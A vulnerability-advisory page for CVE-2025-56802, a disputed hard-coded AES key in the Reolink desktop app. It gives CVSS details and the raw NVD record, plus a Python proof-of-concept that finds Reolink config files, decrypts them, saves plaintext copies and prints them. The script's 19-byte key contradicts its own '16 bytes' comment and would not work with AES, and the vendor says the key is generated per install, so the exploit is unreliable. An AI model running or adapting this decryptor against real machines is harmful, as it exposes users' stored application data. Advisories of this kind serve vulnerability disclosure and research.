Security Vulnerability Report
中文
CVE-2025-56802 CVSS 5.1 MEDIUM

CVE-2025-56802

Published: 2025-10-21 19:21:23
Last Modified: 2025-11-17 16:04:33
Source: [email protected]

Description

The Reolink desktop application uses a hard-coded and predictable AES encryption key to encrypt user configuration files allowing attackers with local access to decrypt sensitive application data stored in %APPDATA%. A different vulnerability than CVE-2025-56801. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:* - VULNERABLE
Reolink Desktop Application 所有使用硬编码AES密钥的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-56802 - Reolink Desktop Application Hardcoded AES Key PoC # Author: shinyColumn # Description: Decrypts Reolink configuration files encrypted with a hardcoded/predictable AES key import os import sys from Crypto.Cipher import AES from Crypto.Util.Padding import unpad import base64 import json # Hardcoded/predictable AES key extracted from Reolink desktop application # This key is embedded in the application binary and used for all installations HARDCODED_AES_KEY = b'reolink_default_key' # 16 bytes for AES-128 def find_reolink_config_path(): """Locate the Reolink configuration directory in %APPDATA%""" appdata = os.environ.get('APPDATA') if not appdata: print("[!] APPDATA environment variable not found") return None # Common Reolink config paths possible_paths = [ os.path.join(appdata, 'Reolink', 'Client'), os.path.join(appdata, 'Reolink'), os.path.join(appdata, 'ReolinkClient'), ] for path in possible_paths: if os.path.exists(path): print(f"[+] Found Reolink config directory: {path}") return path print("[!] Reolink config directory not found") return None def decrypt_config_file(encrypted_file_path, key): """Decrypt a Reolink configuration file using the hardcoded AES key""" try: with open(encrypted_file_path, 'rb') as f: encrypted_data = f.read() # Extract IV (first 16 bytes) and ciphertext if len(encrypted_data) < 16: print(f"[!] File too small: {encrypted_file_path}") return None iv = encrypted_data[:16] ciphertext = encrypted_data[16:] # Decrypt using AES-CBC mode cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_data = unpad(cipher.decrypt(ciphertext), AES.block_size) return decrypted_data except Exception as e: print(f"[!] Decryption failed for {encrypted_file_path}: {e}") return None def main(): print("=" * 60) print("CVE-2025-56802 - Reolink Config Decryptor PoC") print("=" * 60) # Step 1: Find the Reolink configuration directory config_dir = find_reolink_config_path() if not config_dir: sys.exit(1) # Step 2: List encrypted configuration files encrypted_extensions = ['.dat', '.cfg', '.enc', '.bin', '.db'] config_files = [] for root, dirs, files in os.walk(config_dir): for file in files: if any(file.endswith(ext) for ext in encrypted_extensions): config_files.append(os.path.join(root, file)) if not config_files: print("[!] No encrypted configuration files found") sys.exit(1) print(f"[+] Found {len(config_files)} encrypted file(s)") # Step 3: Decrypt each configuration file for file_path in config_files: print(f"\n[*] Decrypting: {file_path}") decrypted_data = decrypt_config_file(file_path, HARDCODED_AES_KEY) if decrypted_data: # Save decrypted content output_path = file_path + '.decrypted' with open(output_path, 'wb') as f: f.write(decrypted_data) print(f"[+] Decrypted content saved to: {output_path}") # Try to display as text/JSON try: text_content = decrypted_data.decode('utf-8') print(f"[+] Content:\n{text_content[:500]}") except UnicodeDecodeError: print(f"[+] Binary content (first 100 bytes): {decrypted_data[:100]}") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56802", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:23.007", "lastModified": "2025-11-17T16:04:32.880", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "The Reolink desktop application uses a hard-coded and predictable AES encryption key to encrypt user configuration files allowing attackers with local access to decrypt sensitive application data stored in %APPDATA%. A different vulnerability than CVE-2025-56801. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*", "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"}]}]}], "references": [{"url": "https://github.com/shinyColumn/CVE-2025-56802", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://shinycolumn.notion.site/reolink-aes-key", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.